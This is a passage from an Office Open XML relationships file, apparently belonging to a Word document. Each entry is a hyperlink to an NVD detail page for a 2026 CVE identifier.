/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 